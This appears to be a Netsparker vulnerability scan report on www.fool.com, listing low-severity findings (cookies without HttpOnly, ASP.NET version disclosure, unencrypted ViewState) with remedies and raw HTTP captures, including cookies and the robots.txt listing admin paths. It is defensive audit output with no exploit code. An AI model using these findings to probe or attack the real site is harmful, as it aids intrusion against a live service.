<li><a class="qsAdd qs-source-idpsithat0000002" href="http://newsletters.fool.com/30/">Million Dollar Portfolio</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/50/">Motley Fool Options</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/1228/">Motley Fool Pro</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/15/">Rule Breakers</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/13/">Rule Your Retirement</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/52/">Special Ops</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002 last" href="http://newsletters.fool.com/18/">Stock Advisor</a></li>
</ul>
</li>
</ul>

<span id="Help"><a class="qsAdd qs-source-ihesittph0000001" href="/help/index.htm">Help</a></span>
<span id="join"><a class="qsAdd qs-source-ijnsittph0000001" href="/Landing/TMF/Registration.aspx">Join Now</a></span>
<span>or</span>
<span id="login"><a class="qsAdd qs-source-ilgsittph0000001" href="https://www.fool.com/secure/login.aspx">Login</a></span>
</div>
</div>
</div><script type="text/javascript">Fool.Util.PseudoClass.hover('#tophatWrap li.topLevel');</script></div><div id="topnav"><div class="grid">

<div id="logo"><a class="qsAdd qs-source-illsitima0000001" href="http://www.fool.com/">The Motley Fool
</a></div>
<form id="searchForm" method="get" action="/search/solr.aspx"><fieldset id="search"><input class="query" value="Enter Keywords or Ticker" type="text" name="q" maxlength="100" /><input type="hidden" name="source" value="ignsittn0000001" /><input id="commandSearch" class="btn doSearch" type="submit" /></fieldset></form>
<div id="menu" class="grid clearfix"><div class="column span-25"><ul class="clearfix">
<li class="qsAdd qs-source-iflsittph0000001 on"><a href="http://www.fool.com/" class="qsAdd qs-source-iflsittph0000001"><span>Home</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvsnv0000001 foolwatch"><a href="/foolwatch/foolwatch.aspx" class="qsAdd qs-source-ifltnvsnv0000001 foolwatch">All Fool Headlines</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://wiki.fool.com/Fool_Labs" class="qsAdd qs-source-ifltnvsnv0000001">Fool Labs</a></li>

<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://military.fool.com/" class="qsAdd qs-source-ifltnvsnv0000001">Fool Military</a></li>
<li class="last qsAdd qs-source-ifltnvsnv0000001"><a href="/press/about.htm" class="last qsAdd qs-source-ifltnvsnv0000001">About The Motley Fool</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ipesittph0000001"><a href="http://my.fool.com/" class="qsAdd qs-source-ipesittph0000001"><span>My Fool</span></a>
<ul>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="https://my.fool.com/Profile" class="qsAdd qs-source-ipesitlnk0000001">My Profile</a></li>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="http://my.fool.com/watchlist" class="qsAdd qs-source-ipesitlnk0000001">My Watchlist</a></li>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="http://boards.fool.com/FavoriteBoards.asp?" class="qsAdd qs-source-ipesitlnk0000001">My Boards</a></li>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="http://caps.fool.com/MyPlayer.aspx" class="qsAdd qs-source-ipesitlnk0000001">My CAPS</a></li>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="http://my.fool.com/#my-reports" class="qsAdd qs-source-ipesitlnk0000001">My Reports</a></li>
<li class="last qsAdd qs-source-ipesitlnk0000001"><a href="https://www.fool.com/Account/Index.aspx" class="last qsAdd qs-source-ipesitlnk0000001">My Settings</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="/how-to-invest/index.aspx" class="qsAdd qs-source-ifltnvpnv0000001"><span>How To Invest</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/how-to-invest/thirteen-steps/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">13 Steps</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/how-to-invest/broker/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Find a Broker</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://wiki.fool.com/" class="qsAdd qs-source-ifltnvsnv0000001">Investing Wiki</a></li>
<li class=" last qsAdd qs-source-ifltnvsnv0000001"><a href="/how-to-invest/personal-finance/index.aspx" class=" last qsAdd qs-source-ifltnvsnv0000001">Personal Finance</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="/investing/index.aspx" class="qsAdd qs-source-ifltnvpnv0000001"><span>Investing Commentary</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="/investing/basics/index.aspx" class="qsAdd qs-source-ifltnvpnv0000001">Basics</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/etf/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">ETFs</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/options/options-a-foolish-introduction.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Options</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/small-cap/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Small-Cap</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/dividends-income/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Dividends & Income</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/high-growth/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">High Growth</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/value/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Value</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/mutualfunds/mutualfunds.htm" class="qsAdd qs-source-ifltnvsnv0000001">Mutual Funds</a></li>
<li class="last qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/international/index.aspx" class="last qsAdd qs-source-ifltnvsnv0000001">International</a></li>
</ul>
</li>
<li class="capsTab qsAdd qs-source-ifltnvpnv0000001"><a href="http://caps.fool.com/index.aspx" class="capsTab qsAdd qs-source-ifltnvpnv0000001"><span>CAPS Community</span></a>
<ul>
<li class="capsHome qsAdd qs-source-icasitlnk0000006"><a href="http://caps.fool.com/" class="capsHome qsAdd qs-source-icasitlnk0000006">CAPS Home</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/" class="qsAdd qs-source-ifltnvsnv0000001">CAPS Home</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/MyPlayer.aspx" class="qsAdd qs-source-ifltnvsnv0000001">My CAPS</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/TickerRankings.aspx?filter=7&sortcol=38&sortdir=1" class="qsAdd qs-source-ifltnvsnv0000001">Stocks</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/Screener.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Screener</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/PlayerRankings.aspx?filter=20&sortcol=5&sortdir=1" class="qsAdd qs-source-ifltnvsnv0000001">Players</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/Blogs/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Blogs</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/Stats.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Top Tens</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/TagRankings.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Tags</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/Contests.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Contests</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/FeedBack.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Contact Us</a></li>
<li class="last qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/Help.aspx" class="last qsAdd qs-source-ifltnvsnv0000001">Help</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="/retirement/index.aspx" class="qsAdd qs-source-ifltnvpnv0000001"><span>Retirement</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/retirement/general/how-to-retire-in-style.aspx" class="qsAdd qs-source-ifltnvsnv0000001">13 Retirement Steps</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/retirement/ira/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">IRAs</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/retirement/401k/401kintro-is-your-retirement-plan-foolish.aspx" class="qsAdd qs-source-ifltnvsnv0000001">401(k)s, Etc.</a></li>
<li class="last qsAdd qs-source-ifltnvsnv0000001"><a href="/retirement/assetallocation/introduction-to-asset-allocation.aspx" class="last qsAdd qs-source-ifltnvsnv0000001">Asset Allocation</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="http://boards.fool.com/" class="qsAdd qs-source-ifltnvpnv0000001"><span>Boards</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://boards.fool.com/BestOf.asp" class="qsAdd qs-source-ifltnvsnv0000001">Best Of</a></li>
<li class="qsAdd qs-source-ifltnvsn..

Cookie Not Marked As HttpOnly

1 TOTAL

LOW

CONFIRMED

Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

See the remedy for solution
Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /robots.txt

/robots.txt CONFIRMED

http://www.fool.com/robots.txt

Identified Cookie

Sookie

Request

GET /robots.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fool.com
Cookie: Sookie=source=&fy=false&ybls=0; Wookie=Ref=http%3a%2f%2fnone%2f; Tookie=T=62122750254005380745485366172445; v1st=E48340A3C6A8D1C; Fool=Uid=1561334274&Username=&V=5&DesktopPreference=false&R=false
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 22 Jul 2010 18:11:12 GMT
Accept-Ranges: bytes
ETag: "008844c929cb1:0"
Server: Microsoft-IIS/7.0
P3P: policyref="http://www.fool.com/w3c/p3p.xml", CP="IDC DSP COR CUR ADMa DEVa TAIa CONo HISa TELo OUR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC IND"
Set-Cookie: Sookie=source=&fy=false&ybls=0; domain=.fool.com; path=/,Tookie=T=62122750254005380745485366172445; domain=.fool.com; expires=Sun, 18-Apr-2021 04:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 21 Apr 2011 12:26:48 GMT
Content-Encoding:
Transfer-Encoding: chunked

# $Revision: 73195 $
# /robots.txt file for http://www.fool.com/ (prod)
# Web Application Stress Tool
User-agent: stress-agent
Disallow: /
# else
User-agent: *
Disallow: /Includes
Disallow: /includes
Disallow: /Scripts
Disallow: /scripts
Disallow: /Admin
Disallow: /admin
Disallow: /Articles
Disallow: /articles
Disallow: /Partners
Disallow: /partners
Disallow: /Private
Disallow: /private
Disallow: /Server
Disallow: /server
Disallow: /Test
Disallow: /test
Disallow: /MailEmergency
Disallow: /mailEmergency
Disallow: /mailemergency
Disallow: /Localize
Disallow: /localize
Disallow: /Snap
Disallow: /snap
Disallow: /FoolPics
Disallow: /foolPics
Disallow: /foolpics
Disallow: /Pegulator
Disallow: /pegulator
Disallow: /Shop/Download/Event/
Disallow: /help
Disallow: /Help
Disallow: /Search
Disallow: /search
Disallow: /Feeds
Disallow: /feeds
Disallow: /News/Xt
Disallow: /News/XT
Disallow: /news/xt
Disallow: /investing/fiercemarkets/
Disallow: /investing/FierceMarkets/

ASP.NET Version Disclosure

1 TOTAL

LOW

Netsparker identified that the target web server is disclosing ASP.NET version in the HTTP response. This information can help an attacker to develop further attacks and also the system can become an easier target for automated attacks. It was leaked from X-AspNet-Version banner of HTTP response or default ASP.NET error page.

Impact

An attacker can use disclosed information to harvest specific security vulnerabilities for the version identified. The attacker can also use this information in conjunction with the other vulnerabilities in the application or web server.

Remedy

Apply the following changes on your web.config file to prevent information leakage by using custom error pages and removing X-AspNet-Version from HTTP responses.

<System.Web>
     < httpRuntime enableVersionHeader="false" /> 
     <customErrors mode="On" defaultRedirect="~/error/GeneralError.aspx">
          <error statusCode="403" redirect="~/error/Forbidden.aspx" />
          <error statusCode="404" redirect="~/error/PageNotFound.aspx" />
          <error statusCode="500" redirect="~/error/InternalError.aspx" />
     </customErrors>
</System.Web>

Remedy References

- /

/

http://www.fool.com/

Extracted Version

2.0.50727

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fool.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
P3P: policyref="http://www.fool.com/w3c/p3p.xml", CP="IDC DSP COR CUR ADMa DEVa TAIa CONo HISa TELo OUR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC IND"
Set-Cookie: Sookie=source=&fy=false&ybls=0; domain=.fool.com; path=/,Wookie=Ref=http%3a%2f%2fnone%2f; domain=.fool.com; expires=Fri, 22-Apr-2011 12:26:48 GMT; path=/,Tookie=T=80347085475864221138615803086606; domain=.fool.com; expires=Sun, 18-Apr-2021 04:00:00 GMT; path=/,v1st=1CFED6B6092B5F98; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.fool.com
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Thu, 21 Apr 2011 12:26:48 GMT
Content-Encoding:
Transfer-Encoding: chunked

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head><title>
Fool.com: Stock Investing Advice | Stock Research
</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8" /><meta property="fb:app_id" content="50808187550" /> <meta http-equiv="imagetoolbar" content="no" /> <link rel="image_src" href="http://g.foolcdn.com/art/ratings/avatars/img_194.gif" /> <link rel="alternate" type="application/rss+xml" href="http://www.fool.com/feeds/index.aspx?id=foolwatch&format=rss2" /> <link href="http://s.foolcdn.com/common/css/fool.css?v=83256" rel="stylesheet" type="text/css" media="all" /><link href="http://s.foolcdn.com/common/css/Bridge.css?v=83256" rel="stylesheet" type="text/css" media="all" /> <link href="http://s.foolcdn.com/common/css/Usmf.css?v=83256" rel="stylesheet" type="text/css" media="all" /> <link href="http://s.foolcdn.com/common/css/globalTickerHover.css?v=83256" rel="stylesheet" type="text/css" media="all" /> <link href="http://s.foolcdn.com/css/Centers/Centers.css?v=83256" rel="stylesheet" type="text/css" media="all" /> <link href="http://s.foolcdn.com/css/Layout.css?v=83256" rel="stylesheet" type="text/css" media="all" /> <link href="http://s.foolcdn.com/css/Layouts/OneColumn.css?v=83256" rel="stylesheet" type="text/css" media="all" /> <link href="http://s.foolcdn.com/css/mainpage.css?v=83256" rel="stylesheet" type="text/css" media="all" /> <link href="http://s.foolcdn.com/css/modules/mom.css?v=83256" rel="stylesheet" type="text/css" media="all" />
<script type='text/javascript'>
var isUserNameCreated = false;
var isLoggedIn = false;
var hasUserName = false;
var isRegistered = false;
</script><script src="http://j.foolcdn.com/common/js/prototype_fool.min.js?v=83256" type="text/javascript"></script> <script src="http://j.foolcdn.com/common/js/fx_usmf.min.js?v=83256" type="text/javascript"></script>  <script src="http://j.foolcdn.com/js/www_expando.min.js?v=83256" type="text/javascript"></script> <script type="text/javascript"> WWW.OneColumn.prepare(); </script> </head> <body id="ctl00_ctl00_ctl00_ctl00_cphContent_Body" class="indexA"> <div id="header" class="navCellA"> <div id="tophat" class="clearfix">
<div class="grid">
<div id="tophatWrap">
<div id="navigation" class="clearfix">
<a class="qsAdd qs-source-iflsittph0000001" href="http://www.fool.com/"><span class="fool">Fool.com</span></a>
<span id="quips">Growing the love for investing</span>
</div>
<div id="userTools">
<span id="welcome">Welcome!</span>
<ul id="premium" class="dropMenu">
<li class="topLevel"><a href="/shop/newsletters/index.aspx" class="qsAdd qs-source-ipesittph0000001"><span><span>Premium Advice</span></span></a><ul>
<li class="info subhead"><strong>My Services</strong></li>
<li class="info">None</li>
<li class="info subhead"><strong>Other Services</strong></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/1414/">Alpha</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/1399/">Big Short</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/1255/">Duke Street</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/25/">Global Gains</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/04/">Hidden Gems</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/08/">Income Investor</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/14/">Inside Value</a></li>
<li><a class="qsAdd qs-source-idpsithat0000002" href="http://newsletters.fool.com/30/">Million Dollar Portfolio</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/50/">Motley Fool Options</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/1228/">Motley Fool Pro</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/15/">Rule Breakers</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/13/">Rule Your Retirement</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002" href="http://newsletters.fool.com/52/">Special Ops</a></li>
<li><a class="qsAdd qs-source-ipesittph0000002 last" href="http://newsletters.fool.com/18/">Stock Advisor</a></li>
</ul>
</li>
</ul>

<span id="Help"><a class="qsAdd qs-source-ihesittph0000001" href="/help/index.htm">Help</a></span>
<span id="join"><a class="qsAdd qs-source-ijnsittph0000001" href="/Landing/TMF/Registration.aspx">Join Now</a></span>
<span>or</span>
<span id="login"><a class="qsAdd qs-source-ilgsittph0000001" href="https://www.fool.com/secure/login.aspx">Login</a></span>
</div>
</div>
</div><script type="text/javascript">Fool.Util.PseudoClass.hover('#tophatWrap li.topLevel');</script></div><div id="topnav"><div class="grid">

<div id="logo"><a class="qsAdd qs-source-illsitima0000001" href="http://www.fool.com/">The Motley Fool
</a></div>
<form id="searchForm" method="get" action="/search/solr.aspx"><fieldset id="search"><input class="query" value="Enter Keywords or Ticker" type="text" name="q" maxlength="100" /><input type="hidden" name="source" value="ignsittn0000001" /><input id="commandSearch" class="btn doSearch" type="submit" /></fieldset></form>
<div id="menu" class="grid clearfix"><div class="column span-25"><ul class="clearfix">
<li class="qsAdd qs-source-iflsittph0000001 on"><a href="http://www.fool.com/" class="qsAdd qs-source-iflsittph0000001"><span>Home</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvsnv0000001 foolwatch"><a href="/foolwatch/foolwatch.aspx" class="qsAdd qs-source-ifltnvsnv0000001 foolwatch">All Fool Headlines</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://wiki.fool.com/Fool_Labs" class="qsAdd qs-source-ifltnvsnv0000001">Fool Labs</a></li>

<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://military.fool.com/" class="qsAdd qs-source-ifltnvsnv0000001">Fool Military</a></li>
<li class="last qsAdd qs-source-ifltnvsnv0000001"><a href="/press/about.htm" class="last qsAdd qs-source-ifltnvsnv0000001">About The Motley Fool</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ipesittph0000001"><a href="http://my.fool.com/" class="qsAdd qs-source-ipesittph0000001"><span>My Fool</span></a>
<ul>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="https://my.fool.com/Profile" class="qsAdd qs-source-ipesitlnk0000001">My Profile</a></li>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="http://my.fool.com/watchlist" class="qsAdd qs-source-ipesitlnk0000001">My Watchlist</a></li>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="http://boards.fool.com/FavoriteBoards.asp?" class="qsAdd qs-source-ipesitlnk0000001">My Boards</a></li>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="http://caps.fool.com/MyPlayer.aspx" class="qsAdd qs-source-ipesitlnk0000001">My CAPS</a></li>
<li class="qsAdd qs-source-ipesitlnk0000001"><a href="http://my.fool.com/#my-reports" class="qsAdd qs-source-ipesitlnk0000001">My Reports</a></li>
<li class="last qsAdd qs-source-ipesitlnk0000001"><a href="https://www.fool.com/Account/Index.aspx" class="last qsAdd qs-source-ipesitlnk0000001">My Settings</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="/how-to-invest/index.aspx" class="qsAdd qs-source-ifltnvpnv0000001"><span>How To Invest</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/how-to-invest/thirteen-steps/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">13 Steps</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/how-to-invest/broker/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Find a Broker</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://wiki.fool.com/" class="qsAdd qs-source-ifltnvsnv0000001">Investing Wiki</a></li>
<li class=" last qsAdd qs-source-ifltnvsnv0000001"><a href="/how-to-invest/personal-finance/index.aspx" class=" last qsAdd qs-source-ifltnvsnv0000001">Personal Finance</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="/investing/index.aspx" class="qsAdd qs-source-ifltnvpnv0000001"><span>Investing Commentary</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="/investing/basics/index.aspx" class="qsAdd qs-source-ifltnvpnv0000001">Basics</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/etf/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">ETFs</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/options/options-a-foolish-introduction.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Options</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/small-cap/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Small-Cap</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/dividends-income/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Dividends & Income</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/high-growth/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">High Growth</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/value/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Value</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/mutualfunds/mutualfunds.htm" class="qsAdd qs-source-ifltnvsnv0000001">Mutual Funds</a></li>
<li class="last qsAdd qs-source-ifltnvsnv0000001"><a href="/investing/international/index.aspx" class="last qsAdd qs-source-ifltnvsnv0000001">International</a></li>
</ul>
</li>
<li class="capsTab qsAdd qs-source-ifltnvpnv0000001"><a href="http://caps.fool.com/index.aspx" class="capsTab qsAdd qs-source-ifltnvpnv0000001"><span>CAPS Community</span></a>
<ul>
<li class="capsHome qsAdd qs-source-icasitlnk0000006"><a href="http://caps.fool.com/" class="capsHome qsAdd qs-source-icasitlnk0000006">CAPS Home</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/" class="qsAdd qs-source-ifltnvsnv0000001">CAPS Home</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/MyPlayer.aspx" class="qsAdd qs-source-ifltnvsnv0000001">My CAPS</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/TickerRankings.aspx?filter=7&sortcol=38&sortdir=1" class="qsAdd qs-source-ifltnvsnv0000001">Stocks</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/Screener.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Screener</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/PlayerRankings.aspx?filter=20&sortcol=5&sortdir=1" class="qsAdd qs-source-ifltnvsnv0000001">Players</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/Blogs/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Blogs</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/Stats.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Top Tens</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/TagRankings.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Tags</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/Contests.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Contests</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/FeedBack.aspx" class="qsAdd qs-source-ifltnvsnv0000001">Contact Us</a></li>
<li class="last qsAdd qs-source-ifltnvsnv0000001"><a href="http://caps.fool.com/Help.aspx" class="last qsAdd qs-source-ifltnvsnv0000001">Help</a></li>
</ul>
</li>
<li class="qsAdd qs-source-ifltnvpnv0000001"><a href="/retirement/index.aspx" class="qsAdd qs-source-ifltnvpnv0000001"><span>Retirement</span></a>
<ul>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/retirement/general/how-to-retire-in-style.aspx" class="qsAdd qs-source-ifltnvsnv0000001">13 Retirement Steps</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/retirement/ira/index.aspx" class="qsAdd qs-source-ifltnvsnv0000001">IRAs</a></li>
<li class="qsAdd qs-source-ifltnvsnv0000001"><a href="/retirement/401k/401kintro-is-your-retirement-plan-foolish.aspx" class="qsAdd qs-source-ifltnvsnv0000001">401(k)s, Etc.</a></li>
<li class="last qsAdd qs-source-ifltnvsnv0000001"><a href="/retirement/assetallocation/introduction-to-asset-allocation.aspx" class="last qsAdd qs-source-ifltnvsnv0000001">Asset Allocation&l..

ViewState is not Encrypted

1 TOTAL

LOW

Netsparker identified that the target web application doesn't use encryption on ViewState data.

Impact

An attacker can study the application's state management logic for possible vulnerabilities and if your application stores application-critical information in the ViewState; it will also be revealed.

Remedy

ASP.NET provides encryption for ViewState parameters.

For page based protection, place the following directive at the top of affected page.

<%@Page ViewStateEncryptionMode="Always" %>

You can also set this option for the whole application by using web.config files. Apply the following configuration for your application's web.config file.

<System.Web>
	<pages viewStateEncryptionMode="Always"> 
</System.Web>

Remedy References

- /Landing/TMF/Registration.aspx

/Landing/TMF/Registration.aspx

http://www.fool.com/Landing/TMF/Registration.aspx

ViewState Version

.NET Framework 2.x

Request

GET /Landing/TMF/Registration.aspx HTTP/1.1
Referer: http://www.fool.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fool.com
Cookie: Sookie=source=&fy=false&ybls=0; Wookie=Ref=http%3a%2f%2fnone%2f; Tookie=T=62122750254005380745485366172445; v1st=E48340A3C6A8D1C; Fool=Uid=1561334274&Username=&V=5&DesktopPreference=false&R=false
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

Forbidden Resource

1 TOTAL

INFORMATION

CONFIRMED

Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.

- /Landing/

/Landing/ CONFIRMED

http://www.fool.com/Landing/

Request

GET /Landing/ HTTP/1.1
Referer: http://www.fool.com/Landing/TMF/Registration.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fool.com
Cookie: Sookie=source=&fy=false&ybls=0; Wookie=Ref=http%3a%2f%2fnone%2f; Tookie=T=62122750254005380745485366172445; v1st=E48340A3C6A8D1C; Fool=Uid=1561334274&Username=&V=5&DesktopPreference=false&R=false
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Content-Type: text/html
Server: Microsoft-IIS/7.0
P3P: policyref="http://www.fool.com/w3c/p3p.xml", CP="IDC DSP COR CUR ADMa DEVa TAIa CONo HISa TELo OUR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC IND"
